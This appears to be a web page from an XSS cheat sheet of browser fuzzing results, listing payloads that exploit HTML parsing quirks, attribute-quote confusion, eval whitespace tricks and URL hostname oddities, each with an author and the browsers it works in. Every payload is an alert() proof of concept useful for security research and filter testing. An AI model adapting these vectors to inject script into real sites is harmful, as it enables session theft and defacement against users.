Cheat Sheet

Generated payloads from fuzz test results. Filter by type, category, or browser.

Found 169 vectors with results

<0x00h1>sample</h1>

Source: Characters allowed between < and element

Author: felipecaon

HTMLHTML ParsingChrome

<img0x00onerror=alert() src=x />

Source: Attribute separators

Author: tr3w

HTMLDOM BehaviorChrome

prompt?.();alert(63)

Source: Valid characters between function and dot-parenthesis .()

Author: felipecaon

JSXSS ExecutionChromeMicrosoft Edge

alert0x09();alert(9)

Source: Valid characters between function and parenthesis

Author: felipecaon

JSXSS ExecutionChrome

alert
();alert(10)

Source: Valid characters between function and parenthesis

Author: felipecaon

JSXSS ExecutionChrome

alert0x0B();alert(11)

Source: Valid characters between function and parenthesis

Author: felipecaon

JSXSS ExecutionChrome

alert0x0C();alert(12)

Source: Valid characters between function and parenthesis

Author: felipecaon

JSXSS ExecutionChrome

alert0x0D();alert(13)

Source: Valid characters between function and parenthesis

Author: felipecaon

JSXSS ExecutionChrome

eval('0x09alert(9)0x09')

Source: Characters that can be used in eval to write code in between

Author: m-boll

JSJavaScript SyntaxFirefoxChrome

eval('0x0Balert(11)0x0B')

Source: Characters that can be used in eval to write code in between

Author: m-boll

JSJavaScript SyntaxFirefoxChrome

eval('0x0Calert(12)0x0C')

Source: Characters that can be used in eval to write code in between

Author: m-boll

JSJavaScript SyntaxFirefoxChrome

eval(' alert(32) ')

Source: Characters that can be used in eval to write code in between

Author: m-boll

JSJavaScript SyntaxFirefoxChrome

eval(';alert(59);')

Source: Characters that can be used in eval to write code in between

Author: m-boll

JSJavaScript SyntaxFirefoxChrome

<div a="><!-- "></div><img src=x:x onerror=alert(34) -->

Source: Characters that act as attribute quotes

Author: hackvertor

XSSHTML ParsingChromeFirefoxSafari

<div a='><!-- '></div><img src=x:x onerror=alert(39) -->

Source: Characters that act as attribute quotes

Author: hackvertor

XSSHTML ParsingChromeFirefoxSafari

<div 0x09="><img src=x:x onerror=alert(9)>"></div>

Source: Characters ignored in an attribute name

Author: hackvertor

XSSDOM BehaviorChromeFirefoxSafari

<div 
="><img src=x:x onerror=alert(10)>"></div>

Source: Characters ignored in an attribute name

Author: hackvertor

XSSDOM BehaviorChromeFirefoxSafari

<div 0x0C="><img src=x:x onerror=alert(12)>"></div>

Source: Characters ignored in an attribute name

Author: hackvertor

XSSDOM BehaviorChromeFirefoxSafari

<div 0x0D="><img src=x:x onerror=alert(13)>"></div>

Source: Characters ignored in an attribute name

Author: hackvertor

XSSDOM BehaviorChromeFirefoxSafari

<div  ="><img src=x:x onerror=alert(32)>"></div>

Source: Characters ignored in an attribute name

Author: hackvertor

XSSDOM BehaviorChromeFirefoxSafari

<div a="><!-- "></div><img src=x:x onerror=alert(34) -->

Source: Characters that act as attribute quotes copy

Author: freddyb

XSSHTML ParsingFirefoxSafariChrome

<div a='><!-- '></div><img src=x:x onerror=alert(39) -->

Source: Characters that act as attribute quotes copy

Author: freddyb

XSSHTML ParsingFirefoxSafariChrome

if (new URL("https://" + String.fromCodePoint(91) + "::ffff:7f00:1]/").hostname === '[::ffff:7f00:1]'){alert(91)}

Source: Characters allowed at IPv6 but don't change the hostname

Author: d0ge

JSURL HandlingFirefoxSafariChrome

if (new URL("https://" + String.fromCodePoint(65095) + "::ffff:7f00:1]/").hostname === '[::ffff:7f00:1]'){alert(65095)}

Source: Characters allowed at IPv6 but don't change the hostname

Author: d0ge

JSURL HandlingFirefoxSafariChrome

if (new URL("https://" + String.fromCodePoint(65339) + "::ffff:7f00:1]/").hostname === '[::ffff:7f00:1]'){alert(65339)}

Source: Characters allowed at IPv6 but don't change the hostname

Author: d0ge

JSURL HandlingFirefoxSafariChrome

"0x091337"==1337&&alert(9)

Source: Characters ignored in strings when doing a non strict comparison

Author: hackvertor